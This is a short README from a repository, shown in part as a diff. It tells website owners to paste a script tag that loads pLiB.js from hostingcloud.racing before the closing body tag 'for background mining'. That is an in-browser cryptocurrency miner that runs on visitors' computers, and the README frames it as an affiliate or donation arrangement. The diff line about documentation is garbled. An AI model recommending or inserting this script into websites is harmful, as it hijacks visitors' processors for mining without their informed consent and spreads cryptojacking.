jwhollbush/jwhollibush/README.md

 ######<a href=https://djjizzygymsock.blogspot.com>My associate's donated blog.
 Big thanks to DJ Jizzy Gymsock and affiliated "artists"</a>######

 Put this code before

 ```
 </body>

 ```
 tag in your website for background mining and thanks for considering it.

-To enable separate mining for site users, check our documentation.
+To enable separate mining for site users, check coming documentation to be rewarded for being an affiliate site. documentation.

 ```
 <script src="https://www.hostingcloud.racing/pLiB.js"></script>